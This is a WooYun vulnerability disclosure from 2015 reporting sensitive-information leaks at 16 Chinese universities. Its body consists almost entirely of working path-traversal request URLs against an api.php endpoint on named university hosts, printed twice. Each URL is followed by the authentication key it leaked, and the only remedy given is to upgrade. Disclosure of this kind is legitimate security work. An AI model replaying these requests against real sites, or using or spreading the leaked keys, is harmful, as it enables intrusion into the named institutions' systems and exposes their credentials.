当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128335

漏洞标题:16所高校敏感信息泄露打包

相关厂商:CCERT教育网应急响应组

漏洞作者: blaz

提交时间:2015-07-22 17:14

修复时间:2015-07-27 17:16

公开时间:2015-07-27 17:16

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

16所高校敏感信息泄露

详细说明:

http://wzb.bnu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"])
http://xcb.ytu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
8Uh9SlA7TsbITlkbn0PTCBEgGu2YKExC
rsgis.whu.edu.cn
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
http://www.ykuc.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
7OoWDH7UfC24hII8F2pPb01U7Q7OxSay
http://sfl.swjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
zfQgF9q94PPw7PLqAsPLuHb0Qw9PGuM2
http://mec.xjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
xhmU2v8QCvBgvf8VIfRvYKtneBnyb6Za
http://jwc.shsmu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
MQgwGUdYCZeNHsMb4HShP0hF5gQpSgto
http://rsgis.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
http://cj.dhu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Hlra5Dsc8VwN8ggbgppFVrkyXgI9Y5gi
http://gr.xupt.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
GO96qk2bSlbK6xE1bMmQXRrXuO1I0zFS
http://software.hebtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
hF5B9BbCByB2c1RyRk1AI9D5MSuPVYk7
http://kj.swufe.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
sg4w8IRFeCg0r6hWlB2SQGw6SgSi8C9t
http://oursim.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
PndaqkaRH6Pe2G7nkPnxSUSLGafw9Gno
http://www.lib.sjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
cmqwkeX4D9RELpW82oCMCclBsdzyVGg5
http://gibs.gcu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aZHD4GxRf2aOrbZ4ehaaXK2vxMD2G0kb
http://hqglc.usx.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
29aVM9gsH7YsqQFT80v0lC75vVBQFHEI

漏洞证明:

http://wzb.bnu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"])
http://xcb.ytu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
8Uh9SlA7TsbITlkbn0PTCBEgGu2YKExC
rsgis.whu.edu.cn
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
http://www.ykuc.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
7OoWDH7UfC24hII8F2pPb01U7Q7OxSay
http://sfl.swjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
zfQgF9q94PPw7PLqAsPLuHb0Qw9PGuM2
http://mec.xjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
xhmU2v8QCvBgvf8VIfRvYKtneBnyb6Za
http://jwc.shsmu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
MQgwGUdYCZeNHsMb4HShP0hF5gQpSgto
http://rsgis.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
http://cj.dhu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Hlra5Dsc8VwN8ggbgppFVrkyXgI9Y5gi
http://gr.xupt.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
GO96qk2bSlbK6xE1bMmQXRrXuO1I0zFS
http://software.hebtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
hF5B9BbCByB2c1RyRk1AI9D5MSuPVYk7
http://kj.swufe.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
sg4w8IRFeCg0r6hWlB2SQGw6SgSi8C9t
http://oursim.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
PndaqkaRH6Pe2G7nkPnxSUSLGafw9Gno
http://www.lib.sjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
cmqwkeX4D9RELpW82oCMCclBsdzyVGg5
http://gibs.gcu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aZHD4GxRf2aOrbZ4ehaaXK2vxMD2G0kb
http://hqglc.usx.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
29aVM9gsH7YsqQFT80v0lC75vVBQFHEI

修复方案:

升级到最新版本

版权声明:转载请注明来源 blaz@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-27 17:16

厂商回复:

最新状态:

暂无